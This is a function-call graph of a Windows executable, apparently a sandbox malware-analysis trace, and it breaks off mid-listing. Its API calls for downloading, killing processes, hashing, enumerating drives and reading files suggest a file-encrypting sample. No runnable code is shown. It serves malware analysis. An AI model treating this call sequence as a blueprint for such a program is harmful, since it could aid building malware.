39022->39023 39024 f269d3 39023->39024 39028 f26a0d ___crtGetEnvironmentStringsW 39023->39028 39036 f33b4c 39023->39036 39024->39028 39046 f5f1bb 59 API calls 3 library calls 39024->39046 39028->38983 39050 f40cfc 58 API calls std::exception::_Copy_str 39031->39050 39033 f5f256 39051 f40eca RaiseException 39033->39051 39035 f5f26b 39038 f33b54 39036->39038 39037 f30c62 _malloc 58 API calls 39037->39038 39038->39037 39039 f33b6e 39038->39039 39041 f33b72 std::exception::exception 39038->39041 39047 f3793d DecodePointer 39038->39047 39039->39024 39048 f40eca RaiseException 39041->39048 39043 f33b9c 39049 f40d91 58 API calls _free 39043->39049 39045 f33bae 39045->39024 39047->39038 39048->39043 39049->39045 39050->39033 39051->39035 39052->39010 39053->38999 39054->39000 39055->38915 39056->38915 39065 f37ad7 GetModuleHandleExW 39057->39065 39060->38910 39069 f3501f GetLastError 39061->39069 39063 f3520d 39063->38920 39064->38908 39066 f37af0 GetProcAddress 39065->39066 39067 f37b07 ExitProcess 39065->39067 39066->39067 39068 f37b02 39066->39068 39068->39067 39083 f42534 39069->39083 39071 f35034 39072 f35082 SetLastError 39071->39072 39086 f38c96 39071->39086 39072->39063 39076 f3505b 39077 f35061 39076->39077 39078 f35079 39076->39078 39093 f3508e 58 API calls 4 library calls 39077->39093 39080 f30bed _free 55 API calls 39078->39080 39082 f3507f 39080->39082 39081 f35069 GetCurrentThreadId 39081->39072 39082->39072 39084 f42547 39083->39084 39085 f4254b TlsGetValue 39083->39085 39084->39071 39085->39071 39088 f38c9d 39086->39088 39089 f35047 39088->39089 39091 f38cbb 39088->39091 39094 f4b813 39088->39094 39089->39072 39092 f42553 TlsSetValue 39089->39092 39091->39088 39091->39089 39102 f429c9 Sleep 39091->39102 39092->39076 39093->39081 39095 f4b81e 39094->39095 39100 f4b839 39094->39100 39096 f4b82a 39095->39096 39095->39100 39097 f35208 __wcsnicmp 57 API calls 39096->39097 39099 f4b82f 39097->39099 39098 f4b849 HeapAlloc 39098->39099 39098->39100 39099->39088 39100->39098 39100->39099 39103 f3793d DecodePointer 39100->39103 39102->39091 39103->39100 39107 f2ccc0 39104->39107 39108 f33b4c 59 API calls 39107->39108 39109 f2ccca 39108->39109 39110 f2c347 39109->39110 39113 f5f1bb 59 API calls 3 library calls 39109->39113 39110->38940 39110->38941 39119 f2cc50 39114->39119 39117 f2c257 39117->38946 39117->38947 39120 f33b4c 59 API calls 39119->39120 39121 f2cc5d 39120->39121 39124 f2cc64 39121->39124 39126 f5f1bb 59 API calls 3 library calls 39121->39126 39124->39117 39125 f2d740 59 API calls 39124->39125 39125->39117 39128 f2c001 39127->39128 39137 f2c00a 39127->39137 39129 f2c083 39128->39129 39130 f2c04c 39128->39130 39128->39137 39132 f2c09e 39129->39132 39135 f2c0e1 39129->39135 39166 f2cf30 39130->39166 39133 f2cf30 59 API calls 39132->39133 39136 f2c0b2 39133->39136 39174 f2c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 39135->39174 39136->39137 39170 f2d5b0 39136->39170 39137->38962 39140 f240f2 39139->39140 39141 f24009 39139->39141 39186 f5f26c 59 API calls 3 library calls 39140->39186 39143 f24016 39141->39143 39144 f2405d 39141->39144 39145 f240fc 39143->39145 39146 f24022 39143->39146 39147 f24106 39144->39147 39148 f24066 39144->39148 39187 f5f26c 59 API calls 3 library calls 39145->39187 39150 f24044 39146->39150 39151 f2402b 39146->39151 39152 f5f23e 59 API calls 39147->39152 39162 f24078 ___crtGetEnvironmentStringsW 39148->39162 39177 f26760 39148->39177 39176 f22e80 59 API calls _memmove 39150->39176 39175 f22e80 59 API calls _memmove 39151->39175 39154 f24110 39152->39154 39158 f2413a 39154->39158 39159 f2412c 39154->39159 39157 f2403b 39157->38969 39164 f256d0 59 API calls 39158->39164 39188 f256d0 39159->39188 39160 f24054 39160->38969 39162->38969 39163 f24135 39163->38969 39165 f24151 39164->39165 39165->38969 39167 f2cf5b 39166->39167 39168 f2cf41 39166->39168 39167->39137 39168->39167 39169 f24690 59 API calls 39168->39169 39169->39168 39171 f2d5e2 39170->39171 39172 f2d63e 39171->39172 39173 f24690 59 API calls 39171->39173 39172->39137 39173->39171 39174->39136 39175->39157 39176->39160 39179 f26793 39177->39179 39178 f267dc 39182 f26817 ___crtGetEnvironmentStringsW 39178->39182 39207 f5f1bb 59 API calls 3 library calls 39178->39207 39179->39178 39180 f33b4c 59 API calls 39179->39180 39179->39182 39180->39178 39182->39162 39186->39145 39187->39147 39189 f25735 39188->39189 39194 f256de 39188->39194 39190 f2573e 39189->39190 39191 f257bc 39189->39191 39193 f26760 59 API calls 39190->39193 39200 f25750 ___crtGetEnvironmentStringsW 39190->39200 39192 f5f23e 59 API calls 39191->39192 39195 f257c6 39192->39195 39193->39200 39194->39189 39198 f25704 39194->39198 39196 f257db 39195->39196 39208 f5f26c 59 API calls 3 library calls 39195->39208 39196->39163 39201 f25709 39198->39201 39202 f2571f 39198->39202 39199 f25806 39200->39163 39203 f23ff0 59 API calls 39201->39203 39204 f23ff0 59 API calls 39202->39204 39205 f25719 39203->39205 39206 f2572f 39204->39206 39205->39163 39206->39163 39208->39199 39209 f64c30 39211 f30c62 58 API calls 39209->39211 39210 f64c3a 39211->39210 39212 f33f84 39213 f33f90 _flsall 39212->39213 39249 f42603 GetStartupInfoW 39213->39249 39216 f33f95 39251 f378d5 GetProcessHeap 39216->39251 39217 f33fed 39218 f33ff8 39217->39218 39580 f3411a 58 API calls 3 library calls 39217->39580 39252 f35141 39218->39252 39221 f33ffe 39222 f34009 __RTC_Initialize 39221->39222 39581 f3411a 58 API calls 3 library calls 39221->39581 39273 f38754 39222->39273 39225 f34018 39226 f34024 GetCommandLineW 39225->39226 39582 f3411a 58 API calls 3 library calls 39225->39582 39292 f4235f GetEnvironmentStringsW 39226->39292 39230 f34023 39230->39226 39232 f3403e 39233 f34049 39232->39233 39583 f37c2e 58 API calls 3 library calls 39232->39583 39302 f421a1 39233->39302 39237 f3405a 39316 f37c68 39237->39316 39240 f34062 39241 f3406d __wwincmdln 39240->39241 39585 f37c2e 58 API calls 3 library calls 39240->39585 39322 f29f90 39241->39322 39244 f34090 39586 f37c59 58 API calls _doexit 39244->39586 39245 f34081 39245->39244 39577 f37f3d 39245->39577 39248 f34095 _flsall 39250 f42619 39249->39250 39250->39216 39251->39217 39587 f37d6c 36 API calls 2 library calls 39252->39587 39254 f35146 39588 f38c48 InitializeCriticalSectionAndSpinCount ___lock_fhandle 39254->39588 39256 f3514b 39257 f3514f 39256->39257 39590 f424f7 TlsAlloc 39256->39590 39589 f351b7 61 API calls 2 library calls 39257->39589 39260 f35154 39260->39221 39261 f35161 39261->39257 39262 f3516c 39261->39262 39263 f38c96 __calloc_crt 58 API calls 39262->39263 39264 f35179 39263->39264 39265 f351ae 39264->39265 39591 f42553 TlsSetValue 39264->39591 39593 f351b7 61 API calls 2 library calls 39265->39593 39268 f351b3 39268->39221 39269 f3518d 39269->39265 39270 f35193 39269->39270 39592 f3508e 58 API calls 4 library calls 39270->39592 39272 f3519b GetCurrentThreadId 39272->39221 39274 f38760 _flsall 39273->39274 39594 f38af7 39274->39594 39276 f38767 39277 f38c96 __calloc_crt 58 API calls 39276->39277 39279 f38778 39277->39279 39278 f387e3 GetStartupInfoW 39286 f387f8 39278->39286 39289 f38927 39278->39289 39279->39278 39280 f38783 _flsall @_EH4_CallFilterFunc@8 39279->39280 39280->39225 39281 f389ef 39603 f389ff LeaveCriticalSection _doexit 39281->39603 39283 f38c96 __calloc_crt 58 API calls 39283->39286 39284 f38974 GetStdHandle 39284->39289 39285 f38987 GetFileType 39285->39289 39286->39283 39288 f38846 39286->39288 39286->39289 39287 f3887a GetFileType 39287->39288 39288->39287 39288->39289 39601 f4263e InitializeCriticalSectionAndSpinCount 39288->39601 39289->39281 39289->39284 39289->39285 39602 f4263e InitializeCriticalSectionAndSpinCount 39289->39602 39293 f34034 39292->39293 39294 f42370 39292->39294 39298 f41f64 GetModuleFileNameW 39293->39298 39634 f38cde 58 API calls 2 library calls 39294->39634 39296 f42396 ___crtGetEnvironmentStringsW 39297 f423ac FreeEnvironmentStringsW 39296->39297 39297->39293 39299 f41f98 _wparse_cmdline 39298->39299 39301 f41fd8 _wparse_cmdline 39299->39301 39635 f38cde 58 API calls 2 library calls 39299->39635 39301->39232 39303 f421ba __W_Gettnames_l 39302->39303 39307 f3404f 39302->39307 39304 f38c96 __calloc_crt 58 API calls 39303->39304 39312 f421e3 __W_Gettnames_l 39304->39312 39305 f4223a 39306 f30bed _free 58 API calls 39305->39306 39306->39307 39307->39237 39584 f37c2e 58 API calls 3 library calls 39307->39584 39308 f38c96 __calloc_crt 58 API calls 39308->39312 39309 f4225f 39310 f30bed _free 58 API calls 39309->39310 39310->39307 39312->39305 39312->39307 39312->39308 39312->39309 39313 f42276 39312->39313 39636 f3962f 58 API calls __wcsnicmp 39312->39636 39637 f342fd 8 API calls 2 library calls 39313->39637 39315 f42282 39318 f37c74 __IsNonwritableInCurrentImage 39316->39318 39638 f4aeb5 39318->39638 39319 f37c92 __initterm_e 39321 f37cb1 __cinit __IsNonwritableInCurrentImage 39319->39321 39641 f319ac 67 API calls __cinit 39319->39641 39321->39240 39323 f29fa0 __ftell_nolock 39322->39323 39642 f1cf10 39323->39642 39325 f29fb0 39326 f29fc4 GetCurrentProcess GetLastError SetPriorityClass 39325->39326 39327 f29fb4 39325->39327 39329 f29fe6 39326->39329 39330 f29fe4 GetLastError 39326->39330 40014 f224e0 109 API calls _memset 39327->40014 39332 f2d3c0 59 API calls 39329->39332 39330->39329 39331 f29fb9 39331->39245 39333 f2a00a 39332->39333 39334 f2a022 39333->39334 39335 f2b669 39333->39335 39339 f2d340 59 API calls 39334->39339 39336 f5f23e 59 API calls 39335->39336 39337 f2b673 39336->39337 39338 f5f23e 59 API calls 39337->39338 39340 f2b67d 39338->39340 39341 f2a04d 39339->39341 39341->39337 39342 f2a065 39341->39342 39656 f23a90 39342->39656 39346 f2a159 GetCommandLineW CommandLineToArgvW lstrcpyW 39347 f2a33d GlobalFree 39346->39347 39362 f2a196 39346->39362 39349 f2a354 39347->39349 39350 f2a45c 39347->39350 39348 f2a100 39348->39346 39672 f22220 39349->39672 39352 f22220 76 API calls 39350->39352 39353 f2a359 39352->39353 39355 f2a466 39353->39355 39687 f1ef50 39353->39687 39354 f2a1cc lstrcmpW lstrcmpW 39354->39362 39355->39245 39357 f2a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 39357->39362 39358 f2a48f 39361 f2a4ef 39358->39361 39692 f23ea0 39358->39692 39359 f30235 60 API calls _TranslateName 39359->39362 39363 f21cd0 92 API calls 39361->39363 39362->39347 39362->39354 39362->39357 39362->39359 39364 f2a361 39362->39364 39365 f2a563 39363->39365 40015 f33c92 59 API calls ___get_qualified_locale_downlevel 39364->40015 39372 f24690 59 API calls 39365->39372 39400 f2a5db 39365->39400 39367 f2a36e lstrcpyW lstrcpyW 39368 f2a395 OpenProcess 39367->39368 39369 f2a402 39368->39369 39370 f2a3a9 WaitForSingleObject CloseHandle 39368->39370 39376 f21cd0 92 API calls 39369->39376 39370->39369 39373 f2a3cb 39370->39373 39371 f2a6f9 40021 f21a10 8 API calls 39371->40021 39375 f2a5a9 39372->39375 39390 f2a3e2 GlobalFree 39373->39390 39391 f2a3d4 Sleep 39373->39391 40016 f21ab0 PeekMessageW 39373->40016 39374 f2a6fe 39378 f2a8b6 CreateMutexA 39374->39378 39379 f2a70f 39374->39379 39382 f24690 59 API calls 39375->39382 39383 f2a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 39376->39383 39385 f2a8ca 39378->39385 39384 f2a7d0 39379->39384 39395 f1ef50 58 API calls 39379->39395 39381 f2a618 39381->39378 39386 f2a624 GetVersion 39381->39386 39387 f2a5d4 39382->39387 39388 f2a451 39383->39388 39392 f1ef50 58 API calls 39384->39392 39389 f1ef50 58 API calls 39385->39389 39386->39371 39393 f2a632 lstrcpyW lstrcatW lstrcatW 39386->39393 39713 f1d240 CoInitialize 39387->39713 39388->39245 39403 f2a8da 39389->39403 39396 f2a3f7 39390->39396 39391->39368 39397 f2a7ec 39392->39397 39398 f2a674 _memset 39393->39398 39406 f2a72f 39395->39406 39396->39245 39399 f2a7f1 lstrlenA 39397->39399 39402 f2a6b4 ShellExecuteExW 39398->39402 39401 f30c62 _malloc 58 API calls 39399->39401 39400->39371 39400->39374 39400->39381 39404 f2a810 _memset 39401->39404 39402->39374 39405 f2a6e3 39402->39405 39407 f23ea0 59 API calls 39403->39407 39418 f2a92f 39403->39418 39409 f2a81e MultiByteToWideChar lstrcatW 39404->39409 39421 f2a9d1 39405->39421 39408 f23ea0 59 API calls 39406->39408 39411 f2a780 39406->39411 39407->39403 39408->39406 39409->39399 39410 f2a847 lstrlenW 39409->39410 39412 f2a8a0 CreateMutexA 39410->39412 39413 f2a856 39410->39413 39414 f2a79c CreateThread 39411->39414 39416 f23ff0 59 API calls 39411->39416 39412->39385 39795 f1e760 39413->39795 39414->39384 41258 f2dbd0 39414->41258 39416->39414 39417 f2a860 CreateThread WaitForSingleObject 39417->39412 41189 f2e690 39417->41189 39419 f25c10 59 API calls 39418->39419 39420 f2a98c 39419->39420 39806 f22840 39420->39806 39421->39245 39423 f2a997 39811 f20fc0 CryptAcquireContextW 39423->39811 39425 f2a9ab 39426 f2a9c2 lstrlenA 39425->39426 39426->39421 39427 f2a9d8 39426->39427 39428 f25c10 59 API calls 39427->39428 39429 f2aa23 39428->39429 39430 f22840 60 API calls 39429->39430 39431 f2aa2e lstrcpyA 39430->39431 39433 f2aa4b 39431->39433 39434 f25c10 59 API calls 39433->39434 39435 f2aa90 39434->39435 39436 f1ef50 58 API calls 39435->39436 39437 f2aaa0 39436->39437 39438 f23ea0 59 API calls 39437->39438 39439 f2aaf5 39437->39439 39438->39437 39440 f23ff0 59 API calls 39439->39440 39441 f2ab1d 39440->39441 39834 f22900 39441->39834 39443 f1ef50 58 API calls 39445 f2abc5 39443->39445 39444 f2ab28 _memmove 39444->39443 39446 f23ea0 59 API calls 39445->39446 39447 f2ac1e 39445->39447 39446->39445 39448 f23ff0 59 API calls 39447->39448 39449 f2ac46 39448->39449 39450 f22900 60 API calls 39449->39450 39452 f2ac51 _memmove 39450->39452 39451 f1ef50 58 API calls 39453 f2acee 39451->39453 39452->39451 39454 f23ea0 59 API calls 39453->39454 39455 f2ad43 39453->39455 39454->39453 39456 f23ff0 59 API calls 39455->39456 39457 f2ad6b 39456->39457 39458 f22900 60 API calls 39457->39458 39461 f2ad76 _memmove 39458->39461 39459 f25c10 59 API calls 39460 f2ae2a 39459->39460 39839 f23580 39460->39839 39461->39459 39463 f2ae3c 39464 f25c10 59 API calls 39463->39464 39465 f2ae76 39464->39465 39466 f23580 59 API calls 39465->39466 39467 f2ae82 39466->39467 39468 f25c10 59 API calls 39467->39468 39469 f2aebc 39468->39469 39470 f23580 59 API calls 39469->39470 39471 f2aec8 39470->39471 39472 f25c10 59 API calls 39471->39472 39473 f2af02 39472->39473 39474 f23580 59 API calls 39473->39474 39475 f2af0e 39474->39475 39476 f25c10 59 API calls 39475->39476 39477 f2af48 39476->39477 39478 f23580 59 API calls 39477->39478 39479 f2af54 39478->39479 39480 f25c10 59 API calls 39479->39480 39481 f2af8e 39480->39481 39482 f23580 59 API calls 39481->39482 39483 f2af9a 39482->39483 39484 f25c10 59 API calls 39483->39484 39485 f2afd4 39484->39485 39486 f23580 59 API calls 39485->39486 39487 f2afe0 39486->39487 39488 f23100 59 API calls 39487->39488 39489 f2b001 39488->39489 39490 f23580 59 API calls 39489->39490 39491 f2b025 39490->39491 39492 f23100 59 API calls 39491->39492 39493 f2b03c 39492->39493 39494 f23580 59 API calls 39493->39494 39495 f2b059 39494->39495 39496 f23100 59 API calls 39495->39496 39497 f2b070 39496->39497 39498 f23580 59 API calls 39497->39498 39499 f2b07c 39498->39499 39500 f23100 59 API calls 39499->39500 39501 f2b093 39500->39501 39502 f23580 59 API calls 39501->39502 39503 f2b09f 39502->39503 39504 f23100 59 API calls 39503->39504 39505 f2b0b6 39504->39505 39506 f23580 59 API calls 39505->39506 39507 f2b0c2 39506->39507 39508 f23100 59 API calls 39507->39508 39509 f2b0d9 39508->39509 39510 f23580 59 API calls 39509->39510 39511 f2b0e5 39510->39511 39512 f23100 59 API calls 39511->39512 39513 f2b0fc 39512->39513 39514 f23580 59 API calls 39513->39514 39515 f2b108 39514->39515 39517 f2b130 39515->39517 40022 f2cdd0 59 API calls 39515->40022 39518 f1ef50 58 API calls 39517->39518 39519 f2b16e 39518->39519 39521 f2b1a5 GetUserNameW 39519->39521 39846 f22de0 39519->39846 39522 f2b1c9 39521->39522 39853 f22c40 39522->39853 39524 f2b1d8 39860 f22bf0 39524->39860 39528 f2b2f5 39871 f236c0 39528->39871 39532 f2b311 39887 f230b0 39532->39887 39534 f22c40 59 API calls 39549 f2b1f3 39534->39549 39537 f22900 60 API calls 39537->39549 39538 f2b327 39913 f211c0 CreateFileW 39538->39913 39539 f23580 59 API calls 39539->39549 39541 f2b33b 39998 f2ba10 LoadCursorW RegisterClassExW 39541->39998 39543 f23100 59 API calls 39543->39549 39544 f2b343 39999 f2ba80 CreateWindowExW 39544->39999 39546 f2b34b 39546->39421 40002 f20a50 GetLogicalDrives 39546->40002 39549->39528 39549->39534 39549->39537 39549->39539 39549->39543 40023 f1f1f0 59 API calls 39549->40023 41780 f37e0e 39577->41780 39579 f37f4c 39579->39244 39580->39218 39581->39222 39582->39230 39586->39248 39587->39254 39588->39256 39589->39260 39590->39261 39591->39269 39592->39272 39593->39268 39595 f38b1b EnterCriticalSection 39594->39595 39596 f38b08 39594->39596 39595->39276 39604 f38b9f 39596->39604 39598 f38b0e 39598->39595 39628 f37c2e 58 API calls 3 library calls 39598->39628 39601->39288 39602->39289 39603->39280 39605 f38bab _flsall 39604->39605 39606 f38bb4 39605->39606 39608 f38bcc 39605->39608 39629 f37f51 58 API calls __NMSG_WRITE 39606->39629 39611 f38bed _flsall 39608->39611 39631 f38cde 58 API calls 2 library calls 39608->39631 39609 f38bb9 39630 f37fae 58 API calls 6 library calls 39609->39630 39611->39598 39613 f38be1 39615 f38bf7 39613->39615 39616 f38be8 39613->39616 39614 f38bc0 39618 f37b0b __lockerr_exit 3 API calls 39614->39618 39617 f38af7 __lock 58 API calls 39615->39617 39619 f35208 __wcsnicmp 58 API calls 39616->39619 39620 f38bfe 39617->39620 39621 f38bca 39618->39621 39619->39611 39622 f38c23 39620->39622 39623 f38c0b 39620->39623 39621->39608 39625 f30bed _free 58 API calls 39622->39625 39632 f4263e InitializeCriticalSectionAndSpinCount 39623->39632 39626 f38c17 39625->39626 39633 f38c3f LeaveCriticalSection _doexit 39626->39633 39629->39609 39630->39614 39631->39613 39632->39626 39633->39611 39634->39296 39635->39301 39636->39312 39637->39315 39639 f4aeb8 EncodePointer 39638->39639 39639->39639 39640 f4aed2 39639->39640 39640->39319 39641->39321 39643 f1cf32 _memset __ftell_nolock 39642->39643 39644 f1cf4f InternetOpenW 39643->39644 39645 f25c10 59 API calls 39644->39645 39646 f1cf8a InternetOpenUrlW 39645->39646 39647 f1cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 39646->39647 39655 f1cfb2 39646->39655 39648 f256d0 59 API calls 39647->39648 39650 f1d000 39648->39650 39649 f256d0 59 API calls 39651 f1d049 39649->39651 39650->39649 39651->39655 40024 f23010 39651->40024 39653 f1d084 39654 f23010 59 API calls 39653->39654 39653->39655 39654->39655 39655->39325 39657 f23ab2 39656->39657 39658 f23ad0 GetModuleFileNameW PathRemoveFileSpecW 39656->39658 39659 f23b00 39657->39659 39660 f23aba 39657->39660 39666 f28400 39658->39666 39661 f5f23e 59 API calls 39659->39661 39662 f33b4c 59 API calls 39660->39662 39663 f23ac7 39661->39663 39662->39663 39663->39658 40027 f5f1bb 59 API calls 3 library calls 39663->40027 39667 f28437 39666->39667 39671 f28446 39666->39671 39667->39671 40028 f25d50 39667->40028 39669 f284b9 39669->39348 39671->39669 40038 f28d50 59 API calls 39671->40038 39673 f3f7c0 __ftell_nolock 39672->39673 39674 f2222d 7 API calls 39673->39674 39675 f2228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39674->39675 39676 f222bd K32EnumProcesses 39674->39676 39675->39676 39677 f222d3 39676->39677 39678 f222df 39676->39678 39677->39353 39679 f22353 39678->39679 39680 f222f0 OpenProcess 39678->39680 39679->39353 39681 f22346 CloseHandle 39680->39681 39682 f2230a K32EnumProcessModules 39680->39682 39681->39679 39681->39680 39682->39681 39683 f2231c K32GetModuleBaseNameW 39682->39683 40039 f30235 39683->40039 39685 f2233e 39685->39681 39686 f22345 39685->39686 39686->39681 39688 f30c62 _malloc 58 API calls 39687->39688 39689 f1ef6e _memset 39688->39689 39690 f1efdc 39689->39690 39691 f30c62 _malloc 58 API calls 39689->39691 39690->39358 39691->39689 39693 f23f05 39692->39693 39697 f23eae 39692->39697 39694 f23fb1 39693->39694 39695 f23f18 39693->39695 39696 f5f23e 59 API calls 39694->39696 39698 f23fbb 39695->39698 39699 f23f2d 39695->39699 39706 f23f3d ___crtGetEnvironmentStringsW 39695->39706 39696->39698 39697->39693 39704 f23ed4 39697->39704 39700 f5f23e 59 API calls 39698->39700 39702 f26760 59 API calls 39699->39702 39699->39706 39701 f23fc5 39700->39701 39703 f23ff0 59 API calls 39701->39703 39702->39706 39705 f23fdf 39703->39705 39707 f23ed9 39704->39707 39708 f23eef 39704->39708 39705->39358 39706->39358 40051 f23da0 59 API calls ___crtGetEnvironmentStringsW 39707->40051 40052 f23da0 59 API calls ___crtGetEnvironmentStringsW 39708->40052 39711 f23eff 39711->39358 39712 f23ee9 39712->39358 39714 f1d27d CoInitializeSecurity 39713->39714 39719 f1d276 39713->39719 39715 f24690 59 API calls 39714->39715 39716 f1d2b8 CoCreateInstance 39715->39716 39717 f1d2e3 VariantInit VariantInit VariantInit VariantInit 39716->39717 39718 f1da3c CoUninitialize 39716->39718 39720 f1d38e VariantClear VariantClear VariantClear VariantClear 39717->39720 39718->39719 39719->39400 39721 f1d3e2 39720->39721 39722 f1d3cc CoUninitialize 39720->39722 40053 f1b140 39721->40053 39722->39719 39725 f1d3f6 40058 f1b1d0 39725->40058 39727 f1d422 39728 f1d426 CoUninitialize 39727->39728 39729 f1d43c 39727->39729 39728->39719 39730 f1b140 60 API calls 39729->39730 39732 f1d449 39730->39732 39733 f1b1d0 SysFreeString 39732->39733 39734 f1d471 39733->39734 39735 f1d496 CoUninitialize 39734->39735 39736 f1d4ac 39734->39736 39735->39719 39738 f1d8cf 39736->39738 39739 f1b140 60 API calls 39736->39739 39738->39718 39740 f1d4d5 39739->39740 39741 f1b1d0 SysFreeString 39740->39741 39742 f1d4fd 39741->39742 39742->39738 39743 f1b140 60 API calls 39742->39743 39744 f1d5ae 39743->39744 39745 f1b1d0 SysFreeString 39744->39745 39746 f1d5d6 39745->39746 39746->39738 39747 f1b140 60 API calls 39746->39747 39748 f1d679 39747->39748 39749 f1b1d0 SysFreeString 39748->39749 39750 f1d6a1 39749->39750 39750->39738 39751 f1b140 60 API calls 39750->39751 39752 f1d6b6 39751->39752 39753 f1b1d0 SysFreeString 39752->39753 39754 f1d6de 39753->39754 39754->39738 39755 f1b140 60 API calls 39754->39755 39756 f1d707 39755->39756 39757 f1b1d0 SysFreeString 39756->39757 39758 f1d72f 39757->39758 39758->39738 39759 f1b140 60 API calls 39758->39759 39760 f1d744 39759->39760 39761 f1b1d0 SysFreeString 39760->39761 39762 f1d76c 39761->39762 39762->39738 40062 f33aaf GetSystemTimeAsFileTime 39762->40062 39764 f1d77d 40064 f33551 39764->40064 39769 f22c40 59 API calls 39770 f1d7b5 39769->39770 39771 f22900 60 API calls 39770->39771 39772 f1d7c3 39771->39772 39773 f1b140 60 API calls 39772->39773 39774 f1d7db 39773->39774 39775 f1b1d0 SysFreeString 39774->39775 39776 f1d7ff 39775->39776 39776->39738 39777 f1b140 60 API calls 39776->39777 39778 f1d8a3 39777->39778 39779 f1b1d0 SysFreeString 39778->39779 39780 f1d8cb 39779->39780 39780->39738 39781 f1b140 60 API calls 39780->39781 39782 f1d8ea 39781->39782 39783 f1b1d0 SysFreeString 39782->39783 39784 f1d912 39783->39784 39784->39738 40072 f1b400 SysAllocString 39784->40072 39786 f1d936 VariantInit VariantInit 39787 f1b140 60 API calls 39786->39787 39788 f1d985 39787->39788 39789 f1b1d0 SysFreeString 39788->39789 39790 f1d9e7 VariantClear VariantClear VariantClear 39789->39790 39791 f1da10 39790->39791 39793 f1da46 CoUninitialize 39790->39793 40076 f3052a 78 API calls vswprintf 39791->40076 39793->39719 40231 f1e670 39795->40231 39797 f1e79e 39798 f23ea0 59 API calls 39797->39798 39799 f1e7c3 39798->39799 39800 f23ff0 59 API calls 39799->39800 39801 f1e7ff 39800->39801 40257 f1e870 39801->40257 39803 f1e806 39804 f23ff0 59 API calls 39803->39804 39805 f1e80d 39803->39805 39804->39805 39805->39417 40511 f23c40 39806->40511 39808 f2288c WideCharToMultiByte 40521 f284e0 39808->40521 39810 f228cf 39810->39423 39812 f2101a 39811->39812 39813 f2102b CryptCreateHash 39811->39813 40530 f40eca RaiseException 39812->40530 39814 f21056 lstrlenA CryptHashData 39813->39814 39815 f21045 39813->39815 39818 f2106e 39814->39818 39819 f2107f CryptGetHashParam 39814->39819 40531 f40eca RaiseException 39815->40531 40532 f40eca RaiseException 39818->40532 39821 f2109f 39819->39821 39823 f210b0 _memset 39819->39823 40533 f40eca RaiseException 39821->40533 39824 f210cf CryptGetHashParam 39823->39824 39825 f210e4 39824->39825 39826 f210f5 39824->39826 40534 f40eca RaiseException 39825->40534 39827 f30c62 _malloc 58 API calls 39826->39827 39829 f21105 _memset 39827->39829 39830 f21148 39829->39830 39831 f304a6 _sprintf 83 API calls 39829->39831 39832 f2114e CryptDestroyHash CryptReleaseContext 39830->39832 39833 f21133 lstrcatA 39831->39833 39832->39425 39833->39829 39833->39830 39835 f23a90 59 API calls 39834->39835 39836 f2294c MultiByteToWideChar 39835->39836 39837 f28400 59 API calls 39836->39837 39838 f2298d 39837->39838 39838->39444 39840 f23591 39839->39840 39841 f235d6 39839->39841 39840->39841 39842 f23597 39840->39842 39845 f235b7 39841->39845 40536 f24f70 59 API calls 39841->40536 39842->39845 40535 f24f70 59 API calls 39842->40535 39845->39463 39847 f22dfa 39846->39847 39848 f22dec 39846->39848 39851 f23ea0 59 API calls 39847->39851 39849 f23ea0 59 API calls 39848->39849 39850 f22df5 39849->39850 39850->39519 39852 f22e11 39851->39852 39852->39519 39854 f22c5f 39853->39854 39857 f22c71 39853->39857 39855 f256d0 59 API calls 39854->39855 39856 f22c6a 39855->39856 39856->39524 39858 f256d0 59 API calls 39857->39858 39859 f22c8a 39858->39859 39859->39524 39861 f23ff0 59 API calls 39860->39861 39862 f22c13 39861->39862 39863 f1ecb0 39862->39863 39865 f1ece5 39863->39865 39866 f1eefc 39865->39866 40537 f31b3b 59 API calls 3 library calls 39865->40537 39866->39549 39867 f256d0 59 API calls 39869 f1ed6b _memmove 39867->39869 39868 f25230 59 API calls 39868->39869 39869->39866 39869->39867 39869->39868 40538 f31b3b 59 API calls 3 library calls 39869->40538 39872 f23742 39871->39872 39873 f236e7 39871->39873 39874 f2370d 39872->39874 40540 f24f70 59 API calls 39872->40540 39873->39872 39875 f236ed 39873->39875 39877 f2377f 39874->39877 39879 f24690 59 API calls 39874->39879 39875->39874 40539 f24f70 59 API calls 39875->40539 39880 f1ca70 39877->39880 39879->39877 39881 f1cb64 39880->39881 39884 f1caa3 39880->39884 39881->39532 39882 f1cb6b 40541 f5f26c 59 API calls 3 library calls 39882->40541 39884->39881 39884->39882 39886 f236c0 59 API calls 39884->39886 39885 f1cb75 39885->39532 39886->39884 39888 f24690 59 API calls 39887->39888 39889 f230d4 39888->39889 39890 f1c740 39889->39890 40542 f30fdd 39890->40542 39893 f1c944 CreateDirectoryW 39895 f30fdd 115 API calls 39893->39895 39900 f1c960 39895->39900 39896 f1c90e 39896->39893 39908 f1c96a 39896->39908 39897 f1c906 39898 f33a38 __fcloseall 83 API calls 39897->39898 39898->39896 39907 f328fd _fputws 82 API calls 39900->39907 39900->39908 39911 f1c9d5 39900->39911 39901 f1c79e _memmove 39901->39897 39910 f25c10 59 API calls 39901->39910 39912 f24f70 59 API calls 39901->39912 40572 f31101 76 API calls 5 library calls 39901->40572 40573 f30546 58 API calls __wcsnicmp 39901->40573 39907->39900 39908->39538 39910->39901 40545 f328fd 39911->40545 39912->39901 39914 f21223 GetFileSizeEx 39913->39914 39933 f21287 39913->39933 39915 f212a3 VirtualAlloc 39914->39915 39916 f21234 39914->39916 39918 f2131a CloseHandle 39915->39918 39922 f212c0 _memset 39915->39922 39916->39915 39917 f2123c CloseHandle 39916->39917 39919 f23100 59 API calls 39917->39919 39918->39541 39920 f21253 39919->39920 40805 f259d0 39920->40805 39925 f212e9 SetFilePointerEx 39922->39925 39957 f213a7 39922->39957 39923 f213b7 SetFilePointer 39928 f213f5 ReadFile 39923->39928 39996 f215ae 39923->39996 39926 f21332 ReadFile 39925->39926 39927 f2130c VirtualFree 39925->39927 39926->39927 39929 f2134f 39926->39929 39927->39918 39930 f21440 39928->39930 39931 f2140f VirtualFree CloseHandle 39928->39931 39929->39927 39934 f21356 39929->39934 39937 f21471 lstrlenA 39930->39937 39938 f21718 lstrlenA 39930->39938 39930->39996 39935 f2142f 39931->39935 39932 f215c5 SetFilePointerEx 39932->39931 39936 f215df 39932->39936 39933->39541 39934->39923 39941 f22c40 59 API calls 39934->39941 39935->39541 39939 f215ed 